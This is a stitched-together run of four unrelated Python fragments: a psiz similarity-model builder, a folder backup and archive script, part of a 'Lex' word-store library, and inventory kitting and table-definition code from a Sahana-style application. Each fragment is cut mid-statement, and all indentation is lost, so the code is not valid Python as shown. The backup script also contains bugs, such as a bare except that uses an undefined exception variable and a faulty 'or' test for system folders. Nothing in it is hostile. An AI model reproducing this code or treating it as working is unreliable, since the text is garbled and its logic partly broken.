kernel_2 = build_vi_kernel(shared_similarity, n_dim, kl_weight)
kernel_group = psiz.keras.layers.GateMulti(
subnets=[kernel_0, kernel_1, kernel_2], group_col=0
)
model = psiz.keras.models.Rank(
stimuli=stimuli, kernel=kernel_group, use_group_kernel=True
)
return model
def build_vi_kernel(similarity, n_dim, kl_weight):
"""Build kernel for single group."""
mink_prior = psiz.keras.layers.MinkowskiStochastic(
rho_loc_trainable=False, rho_scale_trainable=True,
w_loc_trainable=False, w_scale_trainable=False,
w_scale_initializer=tf.keras.initializers.Constant(.1)
)
mink_posterior = psiz.keras.layers.MinkowskiStochastic(
rho_loc_trainable=False, rho_scale_trainable=True,
w_loc_trainable=True, w_scale_trainable=True,
w_scale_initializer=tf.keras.initializers.Constant(.1),
w_loc_constraint=psiz.keras.constraints.NonNegNorm(
scale=n_dim, p=1.
)
)
mink = psiz.keras.layers.MinkowskiVariational(
prior=mink_prior, posterior=mink_posterior,
kl_weight=kl_weight, kl_n_sample=30
)
kernel = psiz.keras.layers.DistanceBased(
distance=mink,
similarity=similarity
)
return kernel
def plot_frame(
fig0, n_obs, train_loss, val_loss, test_loss, r2, model_true,
model_inferred, idx_sorted, i_frame):
"""Plot posteriors."""
# Settings.
group_labels = ['Novice', 'Intermediate', 'Expert']
n_group = len(group_labels)
n_dim = model_inferred.n_dim
gs = fig0.add_gridspec(n_group + 1, n_dim)
f0_ax0 = fig0.add_subplot(gs[0, 0:2])
plot_loss(f0_ax0, n_obs, train_loss, val_loss, test_loss)
f0_ax1 = fig0.add_subplot(gs[0, 2])
plot_convergence(fig0, f0_ax1, n_obs, r2[i_frame])
for i_group in range(n_group):
if i_group == 0:
c = 'r'
elif i_group == 1:
c = 'b'
elif i_group == 2:
c = 'g'
for i_dim in range(n_dim):
name = 'w'
ax = fig0.add_subplot(gs[i_group + 1, | |
<reponame>anjalp/Project-Ultra-Backup
import os
import json
import shutil
import copy
import time
import random
import string
import createSimple as cS
ver_control = 0
software_name = 0
creator = 0
def globalVariable(ver="v1.1.0", soft_name="Project Ultra Backup", author="Anjal.P"):
global ver_control, software_name, creator
ver_control = ver
software_name = soft_name
creator = author
return ver_control, software_name, creator
def errorSave(where_to_save, error_report, root_directory):
global error
where_to_save = where_to_save + "//"
print("Error::")
print("look at: ", where_to_save + "Error Report UB.txt")
ver_control, software_name, creator = globalVariable()
date_error = str(time.localtime(time.time()).tm_mday) + "." + str(time.localtime(time.time()).tm_mon) + "." + str(time.localtime(time.time()).tm_year)
if os.path.exists(where_to_save + "Error Report UB.txt")==False:
try:
with open(where_to_save + "Error Report UB.txt", 'a') as error_file:
error_file.write("--"*50 + "\n")
error_file.write("On Running Restore: " + root_directory + "\n")
error_file.write("Created On: " + date_error + "\n")
error_file.write("Report: \n")
for eachError in error_report:
error_file.write(" > " + eachError + " " + error_report[eachError] + "\n")
error_file.write("This is an automated report generated by " + str(software_name) + " " + str(ver_control) + " " + "Author: " + str(creator) + "\n")
error_file.write("--"*50 + "\n")
error_file.close()
except Exception as e:
print("Error even creating the error log .txt at: " + where_to_save + "Error Report UB.txt")
print("Error Report: " + str(error_report))
print("Error on errorSave: " + str(e))
else:
try:
with open(where_to_save + "Error Report UB.txt", 'a') as error_file:
error_file.write("--"*50 + "\n")
error_file.write("On Running Backup: " + root_directory + "\n")
error_file.write("Created On: " + date_error + "\n")
error_file.write("Report: \n")
for eachError in error_report:
error_file.write(" > " + eachError + " " + error_report[eachError] + "\n")
error_file.write("This is an automated report generated by " + str(software_name) + " " + str(ver_control) + " " + "Author: " + str(creator) + "\n")
error_file.write("--"*50 + "\n")
error_file.close()
except:
print("Error even creating the error log .txt at: " + where_to_save + "Error Report UB.txt")
print("Error Report: " + str(error_report))
print("Error on errorSave: " + str(e))
return
def directoryScan(root_directory):
root_folders = {}
folder_no = 0
root_files = {}
file_no = 0
root_size = 0
files_properties = {}
if os.path.isdir(root_directory)==False:
print("No such Directory exist.....")
else:
os.chdir(root_directory)
for each_obj in os.listdir(root_directory):
if os.path.isfile(each_obj)==True:
root_files[file_no] = each_obj
files_properties[file_no] = list(os.stat(each_obj))[6:]
file_no = file_no + 1
elif os.path.isdir(each_obj)==True:
root_folders[folder_no] = each_obj
folder_no += 1
return root_folders, root_files, files_properties
def updateEngine(root_directory, backup_folder, folder_scan):
new_files = {}
old_files = {}
errorReport = {}
ubs_attendence = 0
date = str(time.localtime(time.time()).tm_mday) + "." + str(time.localtime(time.time()).tm_mon) + "." + str(time.localtime(time.time()).tm_year)
rand_name = ''.join(random.choices(string.ascii_letters + string.digits, k=8))
basename = os.path.basename(root_directory)
if os.path.isdir(backup_folder + basename)==False:
print("Sorry, there is no previous Backup Record, Creating a New Backup.")
try:
cS.createSimpleBackup(root_directory, backup_folder)
except Exception as e:
errorReport["er_createSimpleBackup"] = root_directory + " to " + backup_folder
errorReport["Exception: "] = str(e)
errorSave(root_directory, errorReport, backup_folder)
return
for allFiles in os.listdir(backup_folder + basename):
if allFiles[:3]=="UB_" and allFiles[-4:]==".UBs":
ubfileName = allFiles
ubs_attendence = 1
try:
with open(backup_folder + basename + "//" + allFiles, 'r') as prevUB:
prev_data = json.load(prevUB)
prevUB.close()
except Exception as e:
errorReport["er_open_UBs"] = backup_folder + basename + "//" + allFiles
errorReport["Error: "] = str(e)
errorSave(root_directory, errorReport, backup_folder)
break
if ubs_attendence==0:
print("No .UBs found, so Update Cannot Proceed.")
print("Creating a New Backup: ")
try:
cS.createSimpleBackup(root_directory, backup_folder)
except Exception as e:
errorReport["er_createSimpleBackup"] = root_directory + " to " + backup_folder
errorReport["Exception: "] = str(e)
errorSave(root_directory, errorReport, backup_folder)
return
new_files = copy.deepcopy(folder_scan)
old_files = copy.deepcopy(prev_data)
for eachfoldr in folder_scan:
if eachfoldr in prev_data.keys():
for fold in folder_scan[eachfoldr]["fo_s"]:
if folder_scan[eachfoldr]["fo_s"][fold] in prev_data[eachfoldr]["fo_s"].values():
new_files[eachfoldr]["fo_s"].pop(fold)
for eachFiles in folder_scan[eachfoldr]["fi_s"]:
if folder_scan[eachfoldr]["fi_s"][eachFiles] in prev_data[eachfoldr]["fi_s"].values():
key = list(prev_data[eachfoldr]["fi_s"].keys())[list(prev_data[eachfoldr]["fi_s"].values()).index(folder_scan[eachfoldr]["fi_s"][eachFiles])]
if folder_scan[eachfoldr]["fi_p"][eachFiles][0] == prev_data[eachfoldr]["fi_p"][key][0] and folder_scan[eachfoldr]["fi_p"][eachFiles][2] == prev_data[eachfoldr]["fi_p"][key][2] and folder_scan[eachfoldr]["fi_p"][eachFiles][3] == prev_data[eachfoldr]["fi_p"][key][3]:
new_files[eachfoldr]["fi_s"].pop(eachFiles)
new_files[eachfoldr]["fi_p"].pop(eachFiles)
to_backup = copy.deepcopy(new_files)
for each in new_files:
if len(new_files[each]["fi_s"])==0 and len(new_files[each]["fo_s"])==0:
to_backup.pop(each)
for preveach in prev_data:
if preveach in folder_scan.keys():
for foldroot in prev_data[preveach]["fo_s"]:
if prev_data[preveach]["fo_s"][foldroot] in folder_scan[preveach]["fo_s"].values():
old_files[preveach]["fo_s"].pop(foldroot)
for eachfiles in prev_data[preveach]["fi_s"]:
if prev_data[preveach]["fi_s"][eachfiles] in folder_scan[preveach]["fi_s"].values():
key = list(folder_scan[preveach]["fi_s"].keys())[list(folder_scan[preveach]["fi_s"].values()).index(prev_data[preveach]["fi_s"][eachfiles])]
if prev_data[preveach]["fi_p"][eachfiles][0] ==folder_scan[preveach]["fi_p"][key][0] and prev_data[preveach]["fi_p"][eachfiles][2] ==folder_scan[preveach]["fi_p"][key][2] and prev_data[preveach]["fi_p"][eachfiles][3] ==folder_scan[preveach]["fi_p"][key][3]:
old_files[preveach]["fi_s"].pop(eachfiles)
old_files[preveach]["fi_p"].pop(eachfiles)
to_archieve = copy.deepcopy(old_files)
for each in old_files:
if len(old_files[each]["fi_s"])==0 and len(old_files[each]["fo_s"])==0:
to_archieve.pop(each)
if len(to_archieve)==0:
print("No file to Archive")
else:
print("Found some files to Archive.")
if os.path.isdir(backup_folder + "UB_Archive" + "//" + date)==False:
try:
os.makedirs(backup_folder + "UB_Archive" + "//" + date)
except Exception as e:
errorReport["er_create_UB archieve"] = backup_folder + "UB_Archive" + "//" + date
errorReport["Error: "] = str(e)
print("Archive folder cannot be made...")
errorSave(root_directory, errorReport, backup_folder)
return
for archievefolder in to_archieve:
if os.path.isdir(backup_folder + "UB_Archive" + "//" + date + "//" + archievefolder)==False:
os.makedirs(backup_folder + "UB_Archive" + "//" + date + "//" + archievefolder)
for filesMove in to_archieve[archievefolder]["fi_s"]:
if os.path.isfile(backup_folder + archievefolder + "//" + to_archieve[archievefolder]["fi_s"][filesMove])==True:
try:
shutil.move(backup_folder + archievefolder + "//" + to_archieve[archievefolder]["fi_s"][filesMove], backup_folder + "UB_Archive" + "//" + date + "//" + archievefolder + "//")
except Exception as e:
errorReport["er_moving: "] = backup_folder + archievefolder + "//" + to_archieve[archievefolder]["fi_s"][filesMove] + " to " + backup_folder + "UB_Archive" + "//" + date + "//" + archievefolder + "//"
errorReport["Error: "] = str(e)
errorSave(root_directory, errorReport, backup_folder)
#print(".", end='', flush=True) # old version v1.0.0
#UPDATE FOR FEATURE ENHANCEMENT ON v1.1.0
#This displays the file that is currently backuped, from the previously used . for each file backuped.
print("Archive: " + backup_folder + archievefolder + "//" + to_archieve[archievefolder]["fi_s"][filesMove], flush=True)
for delFolder in old_files:
if os.path.isdir(backup_folder + delFolder)==True:
if delFolder not in folder_scan:
try:
shutil.rmtree(backup_folder + delFolder)
except Exception as e:
errorReport["er_remove directory: "] = backup_folder + delFolder
errorReport["Error: "] = str(e)
errorSave(root_directory, errorReport, backup_folder)
try:
with open(backup_folder + "UB_Archive" + "//" + date + "//" + basename + "//" + "UB_" + date + ".UBar", 'w') as archUB:
json.dump(to_archieve, archUB)
archUB.close()
except Exception as e:
errorReport["er_create_UBs"] = backup_folder + "UB_Archive" + "//" + date + "//" + basename + "//" + "UB_" + date + ".UBar"
errorReport["Error: "] = str(e)
errorSave(root_directory, errorReport, backup_folder)
if len(to_backup)==0:
print("No new Files to Backup")
else:
print("Found Some Files to Backup")
root_directory = root_directory.replace(basename, '')
for copyNew in to_backup:
if os.path.isdir(backup_folder + copyNew + "//")==False:
try:
os.makedirs(backup_folder + copyNew + "//")
except Exception as e:
errorReport["er_create_folder: "] = backup_folder + copyNew + "//"
errorReport["Error: "] = str(e)
errorSave(root_directory, errorReport, backup_folder)
for filesCopy in to_backup[copyNew]["fi_s"]:
try:
shutil.copy(root_directory + "//" + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy], backup_folder + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy])
shutil.copystat(root_directory + "//" + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy], backup_folder + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy])
except Exception as e:
errorReport["er_copy_files: "] = root_directory + "//" + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy] + " to " + backup_folder + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy]
errorReport["Error: "] = str(e)
errorSave(root_directory, errorReport, backup_folder)
#print(".", end='', flush=True) #old version v1.0.0
#UPDATE FOR FEATURE ENHANCEMENT ON v1.1.0
#This displays the file that is currently backuped, from the previously used . for each file backuped.
print("Backup: " + root_directory + "//" + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy], flush=True)
try:
os.remove(backup_folder + basename + "//" + ubfileName)
except Exception as e:
errorReport["er_remove_oldUBs: "] = backup_folder + basename + "//" + ubfileName
errorReport["Error: "] = str(e)
errorSave(root_directory, errorReport, backup_folder)
try:
with open(backup_folder + basename + "//" + "UB_" + rand_name + "_" + date + ".UBs", 'w') as ubFiles:
json.dump(folder_scan, ubFiles)
ubFiles.close()
except Exception as e:
errorReport["er_create_NewUBs: "] = backup_folder + basename + "//" + "UB_" + rand_name + "_" + date + ".UBs"
errorReport["Error: "] = str(e)
errorSave(root_directory, errorReport, backup_folder)
return
def updateBackup(root_directory, backup_folder):
errorReport = {}
folder_det = {}
ubname = str(time.localtime(time.time()).tm_mday) + "." + str(time.localtime(time.time()).tm_mon) + "." + str(time.localtime(time.time()).tm_year)
rand_name = ''.join(random.choices(string.ascii_letters + string.digits, k=8))
basefolder = os.path.basename(root_directory)
split = root_directory.split("//")
index_basefolder = split.index(basefolder)
elim_sec = '//'.join(split[:index_basefolder]) + '//'
for folder, subfolder, files in os.walk(root_directory):
if ("$RECYCLE.BIN" or "found.000" or "System Volume Information") not in folder:
mod_folder = (folder.replace("\\", "//")).replace(elim_sec, '')
folder_det[mod_folder] = {}
try:
folder_det[mod_folder]["fo_s"], folder_det[mod_folder]["fi_s"], folder_det[mod_folder]["fi_p"] = directoryScan(folder.replace("\\", "//") + "//")
except Exception as e:
errorReport["er_directoryScan"] = folder.replace("\\", "//")
errorReport["Exception: "] = str(e)
errorSave(root_directory, errorReport, root_directory)
try:
updateEngine(root_directory, backup_folder + "//", folder_det)
except Exception as e:
errorReport["er_updateEngine_file"] =root_directory + | |
**kwargs):
self._subjected = sbj
self._verbed = self._subjected.lex.root_lex[vrb] # TODO: Move to ... (?)
self._args = list(args)
self._kwargs = kwargs
def __setitem__(self, key, value):
"""
Square-bracket sentence insert (the C in CRUD).
Finish handling the expression:
lex[s](v)[o] = n,t
Specifically, the assignment combined with the right-most square-bracket operator.
"""
objected = self._subjected.lex.root_lex[key]
txt, num = self.extract_txt_num(value, dict())
self._subjected.lex.root_lex.create_word(
sbj=self._subjected,
vrb=self._verbed,
obj=objected,
num=num,
txt=txt,
*self._args,
**self._kwargs
)
def __getitem__(self, item):
"""
Square-bracket sentence extraction from its lex (the R in CRUD).
This is the result of the curried expression:
w = lex[s](v)[o]
Specifically, the right-most square-bracket operator.
So o can be:
an object word
idn of an object
txt of a defined object
This also handles the creation of a new word (the C in CRUD).
w = lex[s](v, t, n)[o]
Without the assignment there may be a warning about code having no effect.
"""
if isinstance(item, six.binary_type):
raise TypeError("Object name must be unicode, not " + repr(item))
objected = self._subjected.lex.root_lex[item]
if self._args or self._kwargs:
txt, num = self.extract_txt_num(self._args, self._kwargs)
# self._kwargs.pop('txt', None)
# self._kwargs.pop('num', None)
# XXX: WTF Why were these here, aren't they SUPPOSED to be removed
# by extract_txt_num??
return self._subjected.lex.root_lex.create_word(
sbj=self._subjected,
vrb=self._verbed,
obj=objected,
num=num,
txt=txt,
*self._args,
**self._kwargs
)
else:
existing_word = self._subjected.lex.word_class()
does_exist = self._subjected.lex.populate_word_from_sbj_vrb_obj(
existing_word,
sbj=self._subjected,
vrb=self._verbed,
obj=objected,
)
if not does_exist:
raise self._subjected.NotExist(
"There is no word type '{word}' such that:\n"
" sbj={sbj}\n"
" vrb={vrb}\n"
" obj={obj}\n"
"in this {lex} (python id {lex_python_id})".format(
word=self._subjected.lex.word_class.__name__,
sbj=self._subjected,
vrb=self._verbed,
obj=objected,
lex=repr(self._subjected.lex),
lex_python_id=id(repr(self._subjected.lex)),
)
)
return existing_word
# return self._subjected.said(self._verbed, objected)
@classmethod
def extract_txt_num(cls, a, k): # aka (args, kwargs)
"""
Get num and/or txt from positional-arguments, and keyword-arguments.
This is the <etc> part of lex[s](v, <etc>)[o]
Or at least part of it.
It's meant to remove from <etc> the num and txt if they're there.
whether they're keyword-arguments or not.
But also leave behind other keyword arguments to pass through to
TypeError if ambiguous or unsupportable.
Examples that will raise TypeError:
extract_txt_num('text', 'more text')
extract_txt_num(1, 42)
extract_txt_num(neither_text_nor_number)
Expects a (args) is a list, not a tuple, so it can be modified in-place.
:return: (txt, num)
"""
# TODO: It was silly to expect a (args) to be a list.
# Only k (kwargs) can have surplus parameters.
# If this function doesn't generate an exception,
# then it used up all of a (args) anyway.
if isinstance(a, tuple):
a = list(a) # A tuple turns into a list. (Oh well, can't know what wasn't absorbed.)
elif isinstance(a, list):
a = a # A list stays the same, that's what we expected, ala args
else:
a = [a] # Anything else is stuffed INTO a list
for arg in a:
if isinstance(arg, six.binary_type):
raise TypeError("Expecting unicode not " + repr(arg))
for name, value in k.items():
if isinstance(value, six.binary_type):
raise TypeError("Expecting " + repr(name) + " to be unicode not " + repr(value))
def type_code(x):
return 'n' if Number.is_number(x) else 't' if Text.is_valid(x) else 'x'
pats = ''.join(type_code(arg) for arg in a) # pats: Positional-Argument Types
t = 'txt' in k
n = 'num' in k
def type_failure():
return TypeError("Expecting a num and a txt, not {} {} {} {} {}".format(
repr(a), repr(k), pats, t, n
))
if pats == '' and not t and not n: r = '' , 1
elif pats == 'n' and not t and not n: r = '' , a[0] ; del a[0]
elif pats == 't' and not t and not n: r = a[0] , 1 ; del a[0]
elif pats == '' and t and not n: r = k.pop('txt'), 1
elif pats == '' and not t and n: r = '' , k.pop('num')
elif pats == 'tn' and not t and not n: r = a[0] , a[1] ; del a[0:2]
elif pats == 'nt' and not t and not n: r = a[1] , a[0] ; del a[0:2]
elif pats == 't' and not t and n: r = a[0] , k.pop('num'); del a[0]
elif pats == 'n' and t and not n: r = k.pop('txt'), a[0] ; del a[0]
elif pats == '' and t and n: r = k.pop('txt'), k.pop('num')
else:
raise type_failure()
try:
return Text(r[0]), Number(r[1])
except ValueError:
raise type_failure()
class Lex(object):
"""
Collection of Number-identified Words.
A Lex instance conceptually contains many Word instances.
Each word is identified by a Number: word.idn
Each Lex instance is associated with a unique subclass of Word.
Each word in the lex is an instance of the subclass.
meta_word is part of a relationship between a parent and child lex.
A parent lex contains a word that represents a child lex.
That is the child's meta_word. It is passed to the constructor of the child lex.
Then the idn of that meta_word is called the meta_idn.
The meta_idn is all the parent lex needs to refer to the child lex.
The parent lex uses the meta_idn to refer to the child lex.
The parent lex uses a suffixed Number to identify a word in the child lex.
The root of that number is the meta_idn
The payload of the suffix is an idn for a word in the child lex
Meta and mesa are opposites, up and down the hierarchy of lexes.
(this is not an inheritance hierarchy)
This hierarchy was invented so a Listing can reconstruct the suffixed idn
needed in the LexSentence words that REFER to Listing words.
Each lex instance keeps track of its child lexes in a dictionary: lex.mesa_lexes.
key - meta_idn, the identifier that represents the child lex
value - child lex instance
SEE: mesa, opposite of meta, https://english.stackexchange.com/a/22805/18673
"""
# TODO: Rename meta -> parent, mesa -> child? Less confusing?
def __init__(self, meta_word=None, word_class=None, **_):
super(Lex, self).__init__()
# NOTE: Blow off unused kwargs here, which might be sql credentials.
# Guess we do this here so sql credentials could contain word_class=Something.
if word_class is None:
class WordClassJustForThisLex(Word):
pass
self.word_class = WordClassJustForThisLex
else:
self.word_class = word_class
self.word_class.lex = self
self.meta_word = meta_word
self.mesa_lexes = dict()
root_lexes = self.root_lex.mesa_lexes
if meta_word in root_lexes:
raise self.LexMetaError(
"Meta Word {this_word} already used for {that_class}. "
"Not available for this {this_class}".format(
this_word=repr(meta_word),
that_class=repr(root_lexes[meta_word]),
this_class=repr(self)
)
)
meta_idn = None if meta_word is None else meta_word.idn
root_lexes[meta_idn] = self
class LexMetaError(TypeError):
"""Something is wrong with Lex meta words, e.g. two sub-lexes use the same meta word."""
def __repr__(self):
"""
EXAMPLE: GoogleQikiListing Word('google user')
EXAMPLE: AnonymousQikiListing Word('anonymous')
"""
if self.meta_word is None:
return type_name(self)
else:
return type_name(self) + " " + repr(self.meta_word)
def __getitem__(self, item):
"""
Square-bracket syntax Word factory.
This gets called when you do either of these
lex[idn]
lex[word] (a copy constructor)
"""
return self.read_word(item)
class NotFound(Exception):
pass
@property
def root_lex(self):
return self._root_lex()
def _root_lex(self):
if self.meta_word is None:
return self
if self.meta_word.lex is None:
return self
else:
# noinspection PyProtectedMember
is_meta_word_from_the_same_lex = (
self.meta_word.lex is self or
self.meta_word.lex._root_lex is self._root_lex
)
if is_meta_word_from_the_same_lex:
# NOTE: This kind of self-reference should never happen.
# Avoid infinite loop anyway.
raise RuntimeError("{} lex's meta_word refers to itself".format(type_name(self)))
else:
return self.meta_word.lex.root_lex # recursion!
def read_word(self, idn_or_word_or_none):
if idn_or_word_or_none is None:
return self.word_class(None)
idn = self.idn_ify(idn_or_word_or_none)
assert isinstance(idn, Number)
if idn is None:
return self.word_class(idn_or_word_or_none)
# NOTE: May never happen, idn_ify() returning None is a freakish outcome.
if idn.is_suffixed():
try:
meta_idn, index = Listing.split_compound_idn(idn)
# TODO: Don't just try unsuffixed. Try all sub-suffixed numbers.
# Allowing nested lexes.
except (Listing.NotAListing, KeyError) as e:
raise Lex.NotFound("{q} is not a Listing idn: {e}".format(
q=idn.qstring(),
e=type_name(e) + " - " + str(e),
))
else:
try:
lex = self.root_lex.mesa_lexes[meta_idn]
except KeyError: # as ke:
raise Lex.NotFound(
"Can't find the Listing's parent Lex {meta_idn}, {index}".format(
meta_idn=meta_idn,
index=index,
)
)
else:
return lex.read_word(index) # parent read delegating to child read
else:
return self.word_class(idn)
def populate_word_from_idn(self, word, idn):
# | |
kit_item in kit_items:
# How much of this supply_item is required per kit?
one_kit = kit_item.quantity * packs[kit_item.item_pack_id]
# How much is required for all Kits?
required = one_kit * quantity
# What stock do we have for this item?
ritem_id = kit_item.item_id
rows = wh_items.find(lambda row: row["inv_inv_item.item_id"] == ritem_id)
# Group by inv_item_id
inv_items = {}
for row in rows:
inv_item_id = row["inv_inv_item.id"]
if inv_item_id in inv_items:
inv_items[inv_item_id].append(row)
else:
inv_items[inv_item_id] = [row]
for inv_item_id in inv_items:
append(inv_item_id)
binned_quantity = 0
bins = inv_items[inv_item_id]
inv_item = bins[0].inv_inv_item
if inv_item.expiry_date:
if expiry_date is None:
# No expiry date set so this item starts the list
expiry_date = inv_item.expiry_date
else:
# Shorten the expiry date if less than for previous items
if inv_item.expiry_date < expiry_date:
expiry_date = inv_item.expiry_date
# How many of this item can we use for these kits?
inv_quantity = inv_item.quantity
pack_quantity = packs[inv_item.item_pack_id]
inv_amount = inv_quantity * pack_quantity
# How many of this item will we use for the kits?
if inv_amount > required:
# Use only what is required
inv_amount = required
inv_quantity -= (inv_amount / pack_quantity)
else:
# We use all
inv_quantity = 0
if len(bins) > 1:
# Multiple Bins
binned_quantity = 0
inv_bins = [row.inv_inv_item_bin for row in bins]
# Optimise to minimise the number of Bins remaining for an Item
inv_bins.sort(key = itemgetter("quantity"))
for inv_bin in inv_bins:
bin_quantity = inv_bin.quantity
binned_quantity += bin_quantity
bin_amount = bin_quantity * pack_quantity
# How many from this bin will we use for the kits?
if bin_amount > required:
# Use only what is required
bin_amount = required
bin_quantity -= (bin_amount / pack_quantity)
else:
# We use all
bin_quantity = 0
# Update the Bin
db(ib_id_field == inv_bin.id).update(quantity = bin_quantity)
# Add to Pick List
insert(kitting_id = kitting_id,
item_id = ritem_id,
item_pack_id = inv_item.item_pack_id,
item_source_no = inv_item.item_source_no,
quantity = bin_amount,
inv_item_id = inv_item_id,
layout_id = inv_bin.layout_id,
)
# Update how much is still required
required -= bin_amount
if not required:
# No more required: move on to the next inv_item_id
break
if binned_quantity < inv_quantity:
# We still have some unbinned to take from
unbinned_quantity = inv_quantity - binned_quantity
unbinned_amount = unbinned_quantity * pack_quantity
# How many of this will we use for the kits?
if unbinned_amount > required:
# Use only what is required
unbinned_amount = required
#else:
# # We use all
# Add to Pick List
insert(kitting_id = kitting_id,
item_id = ritem_id,
item_pack_id = inv_item.item_pack_id,
item_source_no = inv_item.item_source_no,
quantity = unbinned_amount,
inv_item_id = inv_item_id,
#layout_id = None,
)
# Update how much is still required
required -= unbinned_amount
else:
inv_bin = bins[0].inv_inv_item_bin
layout_id = inv_bin.layout_id
if layout_id:
# Single Bin
# Update the Bin
db(ib_id_field == inv_bin.id).update(quantity = inv_quantity)
#else:
# # Unbinned
# Add to Pick List
insert(kitting_id = kitting_id,
item_id = ritem_id,
item_pack_id = inv_item.item_pack_id,
item_source_no = inv_item.item_source_no,
quantity = inv_amount,
inv_item_id = inv_item_id,
layout_id = layout_id,
)
# Update how much is still required
required -= inv_amount
# Update Inv Quantity
db(ii_id_field == inv_item_id).update(quantity = inv_quantity)
if not required:
# No more required: move on to the next kit_item
break
# Add Kits to Stock
# @ToDo: Keep track of Donor? Owner?
# @ToDo: Update Pack Value
new_id = iitable.insert(site_id = site_id,
item_id = item_id,
item_pack_id = item_pack_id,
quantity = quantity,
expiry_date = expiry_date,
)
# supply_item_entity
s3db.update_super(iitable, {"id": new_id})
if current.deployment_settings.get_inv_stock_cards():
append(new_id)
inv_stock_card_update(inv_item_ids,
comments = "Kitting",
)
# =============================================================================
class InventoryMinimumModel(S3Model):
"""
Manage Minimum Stock levels for Sites
Used by: RMS
"""
names = ("inv_minimum",
)
def model(self):
T = current.T
auth = current.auth
WAREHOUSE = T(current.deployment_settings.get_inv_facility_label())
# ---------------------------------------------------------------------
# Minimum Stock Levels
#
tablename = "inv_minimum"
self.define_table(tablename,
# This is a component, so needs to be a super_link
# - can't override field name, ondelete or requires
self.super_link("site_id", "org_site",
default = auth.user.site_id if auth.is_logged_in() else None,
empty = False,
label = WAREHOUSE,
instance_types = auth.org_site_types,
not_filterby = "obsolete",
not_filter_opts = (True,),
ondelete = "CASCADE",
represent = self.org_site_represent,
readable = True,
writable = True,
updateable = True,
# Comment these to use a Dropdown & not an Autocomplete
#widget = S3SiteAutocompleteWidget(),
#comment = DIV(_class = "tooltip",
# _title = "%s|%s" % (WAREHOUSE,
# messages.AUTOCOMPLETE_HELP)),
),
self.supply_item_id(ondelete = "RESTRICT",
required = True,
),
Field("quantity", "double", notnull=True,
default = 0.0,
label = T("Quantity"),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2),
requires = IS_FLOAT_AMOUNT(minimum=0.0),
),
s3_comments(),
*s3_meta_fields()
)
# CRUD strings
current.response.s3.crud_strings[tablename] = Storage(
label_create = T("Add Minimum Stock Level"),
title_display = T("Minimum Stock Level Details"),
title_list = T("Minimum Stock Levels"),
title_update = T("Edit Minimum Stock Level"),
label_list_button = T("List Minimum Stock Levels"),
label_delete_button = T("Delete Minimum Stock Level"),
msg_record_created = T("Minimum Stock Level added"),
msg_record_modified = T("Minimum Stock Level updated"),
msg_record_deleted = T("Minimum Stock Level deleted"),
msg_list_empty = T("No Minimum Stock Levels currently registered"),
)
return {}
# =============================================================================
class InventoryOrderItemModel(S3Model):
"""
Simple Item Ordering for fulfilment of Inventory Requisitions
- for when Procurement model isn't being used
"""
names = ("inv_order_item",
)
def model(self):
T = current.T
# -----------------------------------------------------------------
# Request Item Ordering
#
tablename = "inv_order_item"
self.define_table(tablename,
self.inv_req_item_id(empty = False,
readable = False, # Hidden
writable = False,
),
self.inv_req_id(empty = False,
writable = False, # Auto-populated
),
self.supply_item_id(empty = False,
writable = False, # Auto-populated
),
self.supply_item_pack_id(writable = False, # Auto-populated
),
Field("quantity", "double", notnull=True,
default = 0.0,
label = T("Quantity"),
represent = lambda v: \
IS_FLOAT_AMOUNT.represent(v, precision=2),
#requires = IS_FLOAT_AMOUNT(minimum=0.0),
writable = False, # Auto-populated
),
Field("purchase_ref",
label = T("%(PO)s Number") % \
{"PO": current.deployment_settings.get_proc_shortname()},
represent = lambda v: v if v else NONE,
),
self.inv_recv_id(label = T("Received Shipment"),
),
*s3_meta_fields())
self.configure(tablename,
insertable = False,
)
# CRUD strings
current.response.s3.crud_strings[tablename] = Storage(
#label_create = T("Create Purchase Item"),
title_display = T("Purchase Item Details"),
title_list = T("Purchase Items"),
title_update = T("Edit Purchase Item"),
label_list_button = T("List Purchase Items"),
label_delete_button = T("Delete Purchase Item"),
#msg_record_created = T("Purchase Item Added"),
msg_record_modified = T("Purchase Item Updated"),
msg_record_deleted = T("Purchase Item Deleted"),
msg_list_empty = T("No Purchase Items"),
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return {}
# =============================================================================
class InventoryPackageModel(S3Model):
"""
Packages (Boxes & Pallets)
https://en.wikipedia.org/wiki/Pallet
"""
names = ("inv_package",
"inv_package_id",
)
def model(self):
T = current.T
db = current.db
is_float_represent = IS_FLOAT_AMOUNT.represent
float_represent = lambda v: is_float_represent(v, precision=3)
package_type_opts = {"BOX": T("Box"),
"PALLET": T("Pallet"),
}
# -----------------------------------------------------------------
# Packages
#
tablename = "inv_package"
self.define_table(tablename,
Field("type", length=8,
default = "PALLET",
label = T("Type"),
represent = s3_options_represent(package_type_opts),
requires = IS_IN_SET(package_type_opts,
zero = None,
),
),
Field("name", length=64, notnull=True,
label = T("Name"),
requires = [IS_NOT_EMPTY(),
IS_LENGTH(64),
]
),
Field("width", "double",
default = 0.0,
label = T("Width"),
represent = float_represent,
comment = "m",
),
Field("length", "double",
default = 0.0,
label = T("Length"),
represent = float_represent,
comment = "m",
),
Field("depth", "double",
default = 0.0,
label = T("Depth"),
represent = float_represent,
comment = "m",
),
Field("weight", "double",
default = 0.0,
label = T("Weight"),
represent = float_represent,
comment = "kg",
),
Field("load_capacity", "double",
default = 0.0,
label = T("Load Capacity"),
represent = float_represent,
comment = "kg",
),
Field("max_height", "double",
default = 0.0,
label = T("Maximum Height (m)"),
represent = float_represent,
comment = T("Including the Package"),
),
Field("max_volume", "double",
default = 0.0,
label = T("Maximum Volume"),
represent = float_represent,
comment = "m3",
writable = False,
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
current.response.s3.crud_strings[tablename] = Storage(
label_create = T("Create Package"),
title_display = T("Package Details"),
title_list = T("Packages"),
title_update = T("Edit Package"),
label_list_button = T("List Packages"),
label_delete_button = T("Delete Package"),
msg_record_created = T("Package Added"),
msg_record_modified = T("Package Updated"),
msg_record_deleted = T("Package Deleted"),
msg_list_empty = T("No Packages defined"),
)
self.configure(tablename,
onaccept = self.inv_package_onaccept,
)
# Reusable Field
represent = inv_PackageRepresent()
